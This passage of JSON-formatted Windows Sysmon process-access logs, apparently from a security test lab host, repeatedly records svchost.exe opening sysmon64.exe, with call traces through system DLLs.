05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 